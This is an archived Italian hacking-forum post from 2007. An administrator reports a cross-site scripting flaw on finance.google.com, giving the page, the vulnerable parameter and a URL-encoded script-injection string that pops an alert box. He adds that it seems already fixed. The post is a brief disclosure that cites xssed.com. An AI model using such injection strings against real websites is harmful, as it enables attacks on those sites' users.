GoogleBig » Forum / Hacking - Programming - Cheats / CROSS-SITE SCRIPTING / Vulnerabilita' XSS su finance.google.com

Search | Member List | Calendar | Help | Downloads <-- Only firefox compatible
Current time: 01-08-2010, 07:18 AM | Shoutbox Hello There, Guest! (LoginRegister)


Post Reply  Post Thread 
Vulnerabilita' XSS su finance.google.com
Author Message
Langy
Administrator
*******


Posts: 8.460
Group: Administrators
Joined: Sep 2007
Status: Offline
Reputation: 10
Post: #1
Vulnerabilita' XSS su finance.google.com

Scoperta poco fa da Fugitif una vulnerabilita' di xss sul sito finance.google.com.

Precisamente in questa pagina:

Code:
http://finance.google.com/finance/portfolio?action=add&hash=0bdb25b244bb4501


VARIABILE: pid
XSS:

Code:
1&editmode=basic&add_symbols_1=%27%22%3E%3Cscript%3Ealer
t%281%29%3C%2Fscript%3E&add_ttype_1=BUY&add_date_1=&add_
shares_1=&add_price_1=&add_commission_1=&add_notes_1=


Sembra non andare, sara' stata gia' fixata.

From: http://www.xssed.com/mirror/27391/

"There is no patch for human stupidity" - K. D. M.

This post was last modified: 04-12-2007 06:55 PM by Langy.

unknown browser unknown system
Browser e O.S.: 
04-12-2007 06:19 PM
Visit this user's website Find all posts by this user Quote this message in a reply
Post Reply  Post Thread 

Possibly Related Threads...
Thread: Author Replies: Views: Last Post
  Tutte le xss su google Langy 3 1.156 12-07-2008 11:52 AM
Last Post: Langy
  Guida Completa alla vulnerabilita' XSS N3t.Sh4rk 6 1.520 25-03-2008 10:15 PM
Last Post: N3t.Sh4rk
  New redirect of Google [ Not Fixed ] Langy 0 856 07-03-2008 10:28 AM
Last Post: Langy
  [Vulnerability Cross Site Injection] Last XSS on images.google.com Langy 1 1.241 11-02-2008 07:27 PM
Last Post: code91
  Redirect of Google [ NOT FIXED ] Langy 1 877 26-12-2007 12:56 AM
Last Post: RedTuning

View a Printable Version
Send this Thread to a Friend
Subscribe to this Thread | Add Thread to Favorites

Home Page | Contact Us | Lite (Archive) Mode | RSS